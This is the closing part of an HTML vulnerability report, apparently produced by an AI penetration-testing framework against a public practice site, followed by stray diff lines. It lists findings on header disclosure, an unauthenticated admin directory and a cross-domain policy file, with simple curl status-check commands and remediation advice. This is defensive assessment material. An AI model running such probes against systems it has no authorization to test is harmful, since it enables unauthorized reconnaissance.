Date: Sat, 10 Jan 2026 01:29:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
</code></pre>
<h3>Impact</h3>
<p>Information disclosure can help attackers:</p>
<ul>
<li>Identify specific software versions for targeted exploits</li>
<li>Understand the application architecture</li>
<li>Plan more sophisticated attacks based on known vulnerabilities</li>
</ul>
<h3>Remediation</h3>
<ul>
<li>Remove or modify server identification headers</li>
<li>Configure web server to suppress version information</li>
<li>Implement security headers (X-Frame-Options, X-Content-Type-Options, etc.)</li>
</ul>
<hr />
<h2>MEDIUM - Directory Access Control Issues</h2>
<table>
<thead>
<tr>
<th>Field</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>Severity</td>
<td>Medium</td>
</tr>
<tr>
<td>CVSS</td>
<td>5.0</td>
</tr>
<tr>
<td>CWE</td>
<td>CWE-284</td>
</tr>
<tr>
<td>Location</td>
<td>http://testphp.vulnweb.com/admin/</td>
</tr>
</tbody>
</table>
<h3>Description</h3>
<p>The admin directory is accessible without proper authentication controls, potentially exposing administrative functionality.</p>
<h3>Proof of Concept</h3>
<p><strong>Request:</strong></p>
<pre><code class="language-bash">curl -s -k -o /dev/null -w &quot;%{http_code}&quot; &quot;http://testphp.vulnweb.com//admin/&quot;
</code></pre>
<p><strong>Response Evidence:</strong></p>
<pre><code>200
</code></pre>
<h3>Impact</h3>
<p>Unauthorized access to administrative areas can lead to:</p>
<ul>
<li>Privilege escalation</li>
<li>System configuration changes</li>
<li>Access to sensitive administrative functions</li>
</ul>
<h3>Remediation</h3>
<ul>
<li>Implement proper authentication for administrative areas</li>
<li>Use IP-based access restrictions where appropriate</li>
<li>Apply principle of least privilege</li>
<li>Regular security reviews of directory permissions</li>
</ul>
<hr />
<h2>LOW - Accessible Cross-Domain Policy File</h2>
<table>
<thead>
<tr>
<th>Field</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>Severity</td>
<td>Low</td>
</tr>
<tr>
<td>CVSS</td>
<td>3.1</td>
</tr>
<tr>
<td>CWE</td>
<td>CWE-200</td>
</tr>
<tr>
<td>Location</td>
<td>http://testphp.vulnweb.com/crossdomain.xml</td>
</tr>
</tbody>
</table>
<h3>Description</h3>
<p>The crossdomain.xml file is accessible, which may contain permissive cross-domain policies.</p>
<h3>Proof of Concept</h3>
<p><strong>Request:</strong></p>
<pre><code class="language-bash">curl -s -k -o /dev/null -w &quot;%{http_code}&quot; &quot;http://testphp.vulnweb.com//crossdomain.xml&quot;
</code></pre>
<p><strong>Response Evidence:</strong></p>
<pre><code>200
</code></pre>
<h3>Impact</h3>
<p>Overly permissive cross-domain policies can:</p>
<ul>
<li>Allow unauthorized cross-domain requests</li>
<li>Facilitate cross-site request forgery attacks</li>
<li>Compromise application security boundaries</li>
</ul>
<h3>Remediation</h3>
<ul>
<li>Review and restrict cross-domain policy settings</li>
<li>Remove unnecessary crossdomain.xml files</li>
<li>Implement proper CORS policies instead</li>
</ul>
<h1>Summary</h1>
<table>
<thead>
<tr>
<th>#</th>
<th>Vulnerability</th>
<th>Severity</th>
<th>URL</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>SQL Injection</td>
<td>Critical</td>
<td>http://testphp.vulnweb.com/search.php</td>
</tr>
<tr>
<td>2</td>
<td>Cross-Site Scripting</td>
<td>High</td>
<td>http://testphp.vulnweb.com/search.php</td>
</tr>
<tr>
<td>3</td>
<td>Information Disclosure</td>
<td>Medium</td>
<td>http://testphp.vulnweb.com/</td>
</tr>
<tr>
<td>4</td>
<td>Directory Access Control</td>
<td>Medium</td>
<td>http://testphp.vulnweb.com/admin/</td>
</tr>
<tr>
<td>5</td>
<td>Cross-Domain Policy Exposure</td>
<td>Low</td>
<td>http://testphp.vulnweb.com/crossdomain.xml</td>
</tr>
</tbody>
</table>
<h1>Recommendations</h1>
<ol>
<li><p><strong>IMMEDIATE (Critical Priority)</strong></p>
<ul>
<li>Fix SQL injection vulnerabilities by implementing parameterized queries</li>
<li>Apply input validation and output encoding for XSS prevention</li>
</ul>
</li>
<li><p><strong>HIGH Priority</strong></p>
<ul>
<li>Implement proper authentication for administrative areas</li>
<li>Configure security headers and remove information disclosure</li>
</ul>
</li>
<li><p><strong>MEDIUM Priority</strong></p>
<ul>
<li>Review and restrict cross-domain policies</li>
<li>Conduct comprehensive code review for additional vulnerabilities</li>
</ul>
</li>
<li><p><strong>ONGOING</strong></p>
<ul>
<li>Implement regular security testing and code reviews</li>
<li>Establish secure development practices</li>
<li>Deploy web application firewall (WAF) as additional protection layer</li>
</ul>
</li>
</ol>
</div>
</div>
<div class="footer">
<p>Generated by <strong>NeuroSploit</strong> - AI-Powered Penetration Testing Framework</p>
<p style="margin-top: 0.5rem;">Confidential - For authorized personnel only</p>
</div>
</div>
<script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/highlight.min.js"></script>
<script>
hljs.highlightAll();
// Severity Chart
const ctx = document.getElementById('severityChart').getContext('2d');
new Chart(ctx, {
type: 'doughnut',
data: {
labels: ['Critical', 'High', 'Medium', 'Low', 'Info'],
datasets: [{
data: [5, 5, 7, 6, 9],
backgroundColor: ['#ef4444', '#f97316', '#eab308', '#22c55e', '#6366f1'],
borderWidth: 0,
hoverOffset: 10
}]
},
options: {
responsive: true,
maintainAspectRatio: false,
plugins: {
legend: {
position: 'right',
labels: { color: '#94a3b8', padding: 15, font: { size: 12 } }
}
},
cutout: '60%'
}
});
</script>
</body>
</html>

348
results/campaign_20260109_222127.json Normal file
View File

File diff suppressed because one or more lines are too long

1026
results/campaign_20260109_222914.json Normal file
View File

File diff suppressed because one or more lines are too long